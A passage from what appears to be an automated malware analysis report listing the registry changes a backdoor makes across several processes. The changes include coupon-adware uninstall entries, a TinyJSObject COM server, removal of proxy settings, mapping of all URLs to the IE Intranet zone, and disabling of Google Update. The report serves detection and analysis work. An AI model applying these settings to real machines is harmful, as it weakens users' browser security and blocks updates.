[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1176 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"SilentUninstall" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"DisplayIcon" = "%System%\msiexec.exe"
"CategoryName" = "Apps"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"ProductName" = "WWhiteCouPooni"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"NoRepair" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"InstallDate" = "20150509"
"NoModify" = "1"

"UninstallString" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 3B 87 11 89 AB 78 A3 A9 D1 7F 07 27 F9 62 4E"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F679D2F0-CE91-93C8-BD2D-062DF04DA0C1}]
"DisplayName" = "WWhiteCouPooni"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1988 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"SilentUninstall" = "%Program Files%\ActiveCoupon\ActiveCoupon.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"InstallDate" = "20140222"
"Publisher" = "ActiveCoupon"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"UninstallString" = "%Program Files%\ActiveCoupon\ActiveCoupon.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayName" = "ActiveCoupon"

"NoModify" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"NoRepair" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 63 AF 00 98 6D 98 39 66 CA 6D B1 37 AD 6F F1"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}]
"ProductName" = "ActiveCoupon"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:368 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\""alpha_installer""/n]
"last" = "13075686372168"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\HELPDIR]
"(Default)" = "c:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0]
"(Default)" = "JSIELib"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "c:\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}]
"(Default)" = "ITinyJSObject"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"GlobalMaxTcpWindowSize" = "16777215"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "c:\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 BC A7 08 2A EB 60 D1 52 C0 23 81 D7 42 92 6B"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"(Default)" = "{157B1AA6-3E5C-404A-9118-C1D91F537040}"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "c:\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1888 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 F2 48 D7 33 BA 18 38 EE F1 A4 96 76 F7 F7 CC"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
